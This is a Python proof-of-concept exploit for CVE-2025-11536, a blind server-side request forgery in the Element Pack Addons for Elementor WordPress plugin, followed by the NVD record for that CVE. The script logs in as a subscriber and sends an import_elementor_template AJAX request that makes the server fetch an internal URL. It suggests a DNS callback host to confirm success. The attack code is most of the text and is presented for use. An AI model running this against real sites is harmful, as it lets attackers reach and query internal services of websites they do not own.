CVE-2025-11536

# CVE-2025-11536 Blind SSRF Exploit # Vulnerability: Blind Server-Side Request Forgery in Element Pack Addons for Elementor # Affected versions: <= 8.2.5 # Required privilege: Subscriber-level access or above import requests # Configuration TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "subscriber_password" INTERNAL_TARGET = "http://127.0.0.1:8080/admin" # Internal service to probe # Step 1: Login as subscriber to obtain authentication cookies session = requests.Session() # Get login page to retrieve nonce login_page = session.get(f"{TARGET_URL}/wp-login.php") # Perform login login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In", "redirect_to": f"{TARGET_URL}/wp-admin/", "testcookie": "1" } session.post(f"{TARGET_URL}/wp-login.php", data=login_data) # Step 2: Get a valid nonce for the AJAX action # Navigate to a page that loads the necessary scripts admin_page = session.get(f"{TARGET_URL}/wp-admin/admin-ajax.php") # Step 3: Exploit the Blind SSRF via wp_ajax_import_elementor_template # The malicious URL is passed to the server which will fetch it ssrf_payload = { "action": "import_elementor_template", "url": INTERNAL_TARGET, # Arbitrary URL - the SSRF target "_ajax_nonce": "obtain_nonce_from_page_source" } # Send the malicious AJAX request response = session.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=ssrf_payload ) print(f"Response status: {response.status_code}") print(f"Response body: {response.text[:500]}") print("\nNote: This is a Blind SSRF - response content is not directly visible.") print("Use out-of-band techniques (DNS callbacks, timing) to confirm exploitation.") # Alternative: Use DNS callback to verify SSRF # INTERNAL_TARGET = "http://unique-id.burpcollaborator.net" # Check DNS logs for the callback to confirm the server made the request

{"cve": {"id": "CVE-2025-11536", "sourceIdentifier": "[email protected]", "published": "2025-10-20T22:15:36.727", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Blind Server-Side Request Forgery in all versions up to, and including, 8.2.5 via the wp_ajax_import_elementor_template action. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/bdthemes-element-pack-lite/tags/8.2.4/includes/setup-wizard/init.php#L420", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/97c100c3-8a96-4198-b38a-206268ff20ec?source=cve", "source": "[email protected]"}]}}